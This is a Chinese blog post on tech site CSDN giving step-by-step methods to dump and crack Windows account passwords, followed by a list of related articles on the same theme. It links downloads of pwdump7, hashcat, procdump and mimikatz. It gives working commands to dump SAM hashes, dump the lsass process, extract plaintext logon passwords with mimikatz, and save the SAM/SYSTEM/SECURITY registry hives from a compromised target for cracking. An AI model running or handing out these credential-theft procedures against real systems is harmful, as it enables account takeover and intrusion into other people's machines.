windows密码抓取的多种方法

最新推荐文章于 2024-05-21 20:25:25 发布
最新推荐文章于 2024-05-21 20:25:25 发布
阅读量3.9k 收藏 29
点赞数 6
分类专栏: 操作系统相关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nex1less/article/details/103241312
版权

0x01 准备阶段

1.下载pwdump7:

链接:https://pan.baidu.com/s/1zhSJTNnAl43BHblWU3nI5A

提取码:f74o

解压密码:321      (为啥有解压密码:因为百度云盘不让分享此文件 只好加了个密码)
2.下载hashcat:

链接:https://pan.baidu.com/s/12uoeUrqVQ-Gg7xU1V7fGPQ

提取码:b2od

3.下载procdump64+mimikatz:

链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw

提取码:fc38

4.下载netpass:

https://www.nirsoft.net/utils/network_password_recovery.html

0x02 破解密码

1.利用pwdump7获取系统所有账户的hash值:

运行完你会发现目录下多出一个名为PwDump7.txt的文件

2.打开此文件:你会发现hash值已经被输出出来

3.简单方法破解hash密码:

打开网址:https://www.cmd5.com/

复制pwdump输出的hash直接破译:

4.使用hashcat破解:

hashcat语法:

可以通过hashcat -h参数来查看hashcat具体使用方法

 如:hashcat -a 3 -m 1000 --force DF54DE3F3438343202C1DD523D0265BE ?a?a?a

1.首先查看进程中是否有lsass.exe这个进程 (lsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略。)

2.导出lsass.exe:  procdump64.exe -accepteula -ma lsass.exe lsass.dmp

3.复制输出的lsass.dmp到mimikatz下的指定目录下:

4.执行mimikatz:mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit  获取到密码

1.没有步骤直接运行netpass.exe即可:

1.获得目标系统权限

2.dos窗口执行以下命令

reg save hklm\sam sam.hive 
reg save hklm\system system.hive
reg save hklm\security security.hive

3.目标文件存储于C:\windows\system32目录下 将它们复制出来

4.使用Cain工具

导入之前复制出来的文件

密码破解出来,不过有可能会抓到历史密码

也可以通过cracker导入sam.hive然后通过彩虹表爆破出来

0x03 参考链接

https://hashcat.net/wiki/

https://www.cnblogs.com/chenglee/p/9366399.html 

nex1less
关注
  • 6
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows开机账户与密码获取工具
11-23
抓取Windows电脑开机用户名和密码,包括历史登录的账号及密码,工具中附有详细操作命令,操作简便。
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
口令破解相关操作
最新发布
weixin_62623950的博客
05-21 499
(1)win7系统开启命令行界面,查看当前用户(2)运行cain&abel软件(3)切换至Cracker模块(4)导入本机账户的口令hash值(5)选中待破解账户,右键选择“NTLM Hashes”(6)选择小写字母和数字组合的字符集,查看需要的破解时间。(7)选择更复杂的字符集,查看破解需要的时间(8)最后,选择所选用户口令的相应字符集,进行破解。
Windows密码抓取神器mimikatz2.0
weixin_34194087的博客
07-05 449
只要借用一下电脑,便可轻松拿到密码……“女神,借用电脑一看可否?”大神们都知道的东西吧,***测试常用工具。法国一个牛B的人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。2.0版本的只需要两条命令就可以了,比以前版本的更简单了。第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpass...
Windows抓取密码的四种方式&&其他各类密码抓取
huohaowen的博客
03-22 2242
对于Windows(不是域环境)我们有四种方法抓取它的密码在这次的blog,我们还是用的mimkatz。
windows密码获取
07-29 2279
概述 渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。 windows密码获取方法 最主流的获取windows 密码方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。 使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。 mimikatz直接获取 直接将mimikatz 上传到
国外的windows密码获取工具
09-05
直接运行exe可获得命令 --output 路径+文件名可以导出数据。
系统密码截获源代码.rar_Windows 密码_系统密码
09-24
这意味着这个代码可能包含了多种技术手段,比如键盘钩子(Keyboard Hook)、屏幕抓取(Screen Scraping)或者更深入的系统级API监控,用于捕获用户在密码输入字段中键入的信息。这种能力在某些合法的软件开发或安全...
一键获取windows密码神器mimikatz咪咪猫
07-23
5. **法律和伦理**:使用Mimikatz进行密码抓取必须遵循法律法规,未经许可对他人系统进行此类操作可能涉及违法。 总的来说,Mimikatz是一个强大的工具,对于安全研究人员和管理员来说,它是检测和修复安全漏洞的...
wce Windows hash抓取工具 附教程
09-19
标题中的“wce Windows hash抓取工具”是一种用于在Windows操作系统中获取用户密码散列值的工具。在网络安全和渗透测试领域,这种工具被用来模拟攻击者的行为,以评估系统的安全性和潜在的漏洞。wce(Windows CE ...
curl-7.79-windows版本
03-30
- **HTTP/HTTPS**:支持GET、POST、PUT等多种HTTP方法。 - **FTP/FTPS**:文件传输,支持上传和下载。 - **SMTP/POP3/IMAP**:邮件协议操作,发送和接收邮件。 - **TLS/SSL**:提供安全的数据传输。 - **DICT, FILE,...
PwDump7.exe
07-10
PwDump7 一次性导出系统全部帐号的HASH工具。渗透人员及网管必备
netpass(Network Password Recovery)可以查看windows用户下密码的软件
05-09
netpass(Network Password Recovery),可以查看windows用户下密码的软件,如果忘记自己的密码,可以使用这个软件来查看
PwDump7.exe+libeay32.dll
09-01
Pwdump7可以在CMD下提取出系统中的用户的密码hash (包括LM和NTLM),当然必须要有系统权限.提取出了HASH,再用ophcrack破出明文密码,对进一步渗透是有很大帮助的,经测试,在XP下是可以成功提取出来的.这个工具需要一个DLL文件支持,压缩包中带的,只需放到一个文件夹中即可,用法很简单,直接输入 D:\>PwDump7.exe Pwdump v7.1 - raw password extractor Author: Andres Tarasco Acuna url: http://www.514.es administrator:500:25FC25A0CA659E57ACEDB07452AB7A8E:6C1B3BE8D28CD3E7AB63122C87747.net72DDF :::guest:501:0E175C3EFF8EED1652440321FCD91E4E:28509914510717747.netB7A95F2977D4AAEF0::: atarasco:1001:45C6AEEDC857A06DC595236F8F5FECAA:D0253497114C1B4CC337210F4580A716::: 用法: pwdump7.exe (Dump system passwords) pwdump7.exe -s (Dump passwords from files) pwdump7.exe -d [destionation] (Copy filename to destionation) pwdump7.exe -h (Show this help) -s 是从一个sam文件中提取hash,这个文件在%systemroot%\config\sam,这里. -d 是把一个文件复制到另一个位置,D:\>PwDump7.exe -d c:\pagefile.sys pagefile.dmp 从这个例子中可以看出,他的特别之处在于,可以把进程正在占用的文件复制成功. 解决提示libeay32.dll找不到或缺少的问题 拷贝libeay32.dll到windows/system32下即可
windows抓取用户密码
ATpiu的博客
07-14 3917
前言 windows环境下,一般推荐用procdump配合mimikatz来读取密码。 使用procdump的原因是微软官方的,不容易出问题。 条件 已获得当前windows管理员权限 管理员登录过该系统,且当前系统运行着lsass.exe进程 利用 从https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载procdump。 使用管理员权限运行cmd,切换到procdump所在目录,运行procdump64.exe -ac
Windwos密码导出的几种姿势
热门推荐
Matthew
09-14 1万+
这篇文章主要是介绍怎么在本地提取用户密码,把知识整理了一下,把知识整理起来的威力还是挺大的。以下的方式分为要免杀和不需要免杀的方式。文章介绍的技术具有一定的攻击性,主要用于学习。 要免杀: 1.Getapss Getapss是由闪电小子根据mimikatz编译的一个工具,可以获取明文密码。现在有32位和64位了,直接运行getpass.exe。 2.QuarksPwDu
多种姿势抓取windows系统的hash值
p_utao的博客
09-12 4867
hashdump抓取密码 从目标机中提取hash值,破解hash值就可获得账号密码,计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要访问就必须有系统级账号,所以要使用该命令就必须进行权限提升 在shell提示符下输入hashdump命令,将导出目标机sam数据库中的hash meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b5140
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
m0_62207170的博客
05-12 1534
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
pwdump8使用方法
05-11
Pwdump8是一个Windows密码抓取工具,可以用来获取Windows操作系统中本地用户和域用户的密码等信息。以下是Pwdump8的使用方法: 1. 首先下载Pwdump8工具,可以从网络上搜索并下载。 2. 将Pwdump8.exe文件复制到Windows系统目录下,例如C:\Windows\System32。 3. 打开命令提示符窗口(按下Win+R键,输入cmd并回车)。 4. 进入Windows系统目录,输入cd C:\Windows\System32并回车。 5. 输入pwdump8命令并回车,将会输出所有本地用户和域用户的哈希值。 6. 如果需要将哈希值破解为明文密码,可以使用在线工具或者破解软件进行破解。 需要注意的是,使用Pwdump8工具获取他人密码是非法行为,仅可用于测试和学习目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值